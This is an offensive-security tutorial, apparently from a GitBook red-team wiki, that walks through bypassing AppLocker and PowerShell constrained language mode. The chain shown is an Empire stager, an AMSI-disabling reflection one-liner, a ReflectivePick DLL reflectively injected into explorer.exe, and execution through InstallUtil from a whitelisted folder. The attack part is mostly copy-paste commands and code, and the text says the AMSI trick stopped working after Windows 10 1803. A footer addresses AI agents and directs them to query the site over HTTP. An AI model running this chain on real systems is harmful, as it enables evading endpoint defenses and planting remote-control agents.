# Bypassing Applocker and Powershell contstrained language mode ## Using Reflective Injection and Certutil This technique involves packing everything together several times to bypass all the security mechanisms. I based this on the [awesome article ](https://improsec.com/blog/babushka-dolls-or-how-to-bypass-application-whitelisting-and-constrained-powershell)from Improsec called "Babushka dolls" and elements from it's Github project. **Edit: Sadly after Windows 10 1803 and onwards this trick doesn't work for bypassing AMSI any longer. AMSI now uses a scanbuffer instead of scanstring which was previously used.** ### Generating listener and stager in Empire Set up a listener and generate a stager. I've put all the commands below for easy copypaste. ``` ./Empire listeners uselistener set Host 10.0.0.15 set Port 80 execute back usestager multi/launcher set Listener http generate ``` ![](/files/-LOD_3E5oZbBiam86Usz) ![](/files/-LOD_FcPV9CfcXV1Ysrf) ### ReflectivePick with Visual Studio We are now going to write the stager we generated into the ReflectivePick project. Open the [PowerPick project ](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick/ReflectivePick)in VS. It may be necessary to set the target to x64. Project -> ReflectivePick properties -> Configuration Manager -> Platform ![](/files/-LOD_liPhVHEZeggXmID) Add the base64 from the stager where appropriate. ![](/files/-LODcGVNblBIAxcrDenT) `wchar_t* argument = L"[Ref].Assembly.GetType('System.Management.Automation.sAmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);$encoded = \"BASE64STRING\";$decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded));$decoded | Out-File -FilePath C:\Windows\Tasks\out.txt;IEX $decoded"; //Output debug` This includes an output write for demonstration purposes. You can remove it if you desire. Compile the dll to `ReflectivePick_x64.dll` ![](/files/-LODf-HZXVW3eFGYl_fP) ### Execution We can now try to run the dll with `rundll32.exe .\ReflectivePick_x64.dll,Void` but as you will soon discover, AMSI picks up the Empire stager during runtime. ![](/files/-LODZ1XSgrRpZIF06LAN) Disable AMSI however, and you get an agent back. ![](/files/-LODe9pxMld_vegJdkV2) You can also view the base64-decoded stager payload in `c:\windows\tasks\out.txt` ![](/files/-LODePJSbSFDjIoupDUL) We can't rely on manually disabling AMSI, so we are going to run it through a few more hoops. ### Load the DLL into another process To avoid creating a new process and loading the non-whitelisted DLL we are going to reflectively inject it into a process using [Invoke-ReflectiveInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). Use the following commands in PS to encode the DLL to base64 and pipe the results to a file. Don't worry if the commands take a few seconds to run. I have also noticed that Powershell adds a newline at the bottom of the file when Base64-encoding like this so manually remove that if it is present. ``` $Content = Get-Content .\ReflectivePick_x64.dll -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\dll.txt" ``` ![](/files/-LODhGGB3nJcqsyrJmmW) Now you want to download [Invoke-ReflectivePEInjection](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1) to the working directory and open it in a text editor. At the bottom of the file, add the following lines, where we copypaste the contents of `dll.txt` to the `$dllData` object. This will ensure the dll is reflectively injected into the `explorer.exe` process during runtime. ``` $dllData = "DLLBASE64_GOES_HERE" $ProcId = (Get-Process explorer).Id $Bytes = [System.Convert]::FromBase64String($dllData) Invoke-ReflectivePEInjection -PEBytes $Bytes -ProcId $ProcId ``` ![](/files/-LOEFcB-T-DY2VNgVNmI) ### Compile to an EXE using VS In powershell, base64 encode the entire script. Remove the newline at the bottom of the output file if present. ``` $Content = Get-Content .\Invoke-ReflectivePEInjection.ps1 -Encoding Byte $Encoded = [System.Convert]::ToBase64String($Content) $Encoded | Out-File "C:\users\chris\Desktop\PowerTools-master\PowerPick\bin\x64\Debug\pe.txt" ``` ![](/files/-LODkjnLAmWMt8VGDQ_f) Open the [Bypass project](https://github.com/MortenSchenk/Babuska-Dolls/tree/master/Bypass) in VS and copypaste the base64 into the encoded variable. Compile to `Bypass.exe` with VS. ![](/files/-LOEFShMYmaq_sUFqaaS) ### Final execution Use `installutil.exe` or similar [LOLbBns ](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LOLBins.md)to execute `Bypass.exe`. If Applocker is present, execute it from a whitelisted directory such as `C:\Windows\Tasks` ``` C:\windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Windows\Tasks\Bypass.exe ``` ![](/files/-LOEE91ztrMVlzoHbpq-) ![](/files/-LOEEH5P2ObycOZP5-cM) Thrilling! We bypassed both Applocker and Powershell constrained language mode and got an Empire agent back. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.